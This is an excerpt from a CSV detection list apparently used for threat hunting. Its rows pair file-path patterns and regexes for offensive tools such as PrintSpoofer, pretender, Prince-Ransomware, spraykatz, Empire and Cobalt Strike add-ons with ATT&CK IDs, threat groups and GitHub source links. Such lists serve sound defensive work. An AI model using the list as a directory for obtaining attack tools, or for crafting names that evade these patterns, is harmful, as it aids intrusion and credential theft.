"*/prepare.sh shell/mod_*.htaccess*",".{0,1000}\/prepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","#linux","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","9861"
"*/pretender.exe*",".{0,1000}\/pretender\.exe.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9862"
"*/pretender.git*",".{0,1000}\/pretender\.git.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9863"
"*/pretender_Linux_arm.tar.gz*",".{0,1000}\/pretender_Linux_arm\.tar\.gz.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","#linux","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9864"
"*/pretender_Windows_x86_64.zip*",".{0,1000}\/pretender_Windows_x86_64\.zip.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9865"
"*/PrimusC2*",".{0,1000}\/PrimusC2.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","9866"
"*/PrimusC2.git*",".{0,1000}\/PrimusC2\.git.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","9867"
"*/Prince-Built.exe*",".{0,1000}\/Prince\-Built\.exe.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","9868"
"*/Prince-Ransomware.git*",".{0,1000}\/Prince\-Ransomware\.git.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","9869"
"*/PrintCreds.py*",".{0,1000}\/PrintCreds\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","9870"
"*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9871"
"*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","9872"
"*/printernightmare.ps1*",".{0,1000}\/printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","9873"
"*/PrintMonitorDll.*",".{0,1000}\/PrintMonitorDll\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","9874"
"*/PrintMonitorDll/*",".{0,1000}\/PrintMonitorDll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","9875"
"*/PrintNightmare.git*",".{0,1000}\/PrintNightmare\.git.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","1","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","9876"
"*/printnightmare.py*",".{0,1000}\/printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9877"
"*/PrintSpoofer.dll*",".{0,1000}\/PrintSpoofer\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9878"
"*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9879"
"*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","9880"
"*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9881"
"*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9882"
"*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","9883"
"*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","9884"
"*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","9885"
"*/PrintSpoofer/*",".{0,1000}\/PrintSpoofer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","9886"
"*/Priv_Esc.sh*",".{0,1000}\/Priv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9887"
"*/PrivEditor.dll*",".{0,1000}\/PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","9888"
"*/Privesc.git*",".{0,1000}\/Privesc\.git.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","9889"
"*/privesc.ps1*",".{0,1000}\/privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","9890"
"*/PrivEsc.psm1*",".{0,1000}\/PrivEsc\.psm1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","9891"
"*/privesc/*",".{0,1000}\/privesc\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9892"
"*/PrivescCheck*",".{0,1000}\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","9893"
"*/PrivescCheck.ps1*",".{0,1000}\/PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9894"
"*/PrivExchange*",".{0,1000}\/PrivExchange.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 -  T1101 -  T1201 -  T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","9895"
"*/PrivExchange.git*",".{0,1000}\/PrivExchange\.git.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","9896"
"*/privexchange.py*",".{0,1000}\/privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9897"
"*/PrivFu.git*",".{0,1000}\/PrivFu\.git.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","9898"
"*/privilege escalation.cna*",".{0,1000}\/privilege\sescalation\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9899"
"*/PrivilegeEscalation/*",".{0,1000}\/PrivilegeEscalation\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","9900"
"*/Privileger.git*",".{0,1000}\/Privileger\.git.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","9901"
"*/PrivKit.git*",".{0,1000}\/PrivKit\.git.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","9902"
"*/PrivKit/*",".{0,1000}\/PrivKit\/.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","9903"
"*/proberbyte.go*",".{0,1000}\/proberbyte\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","9905"
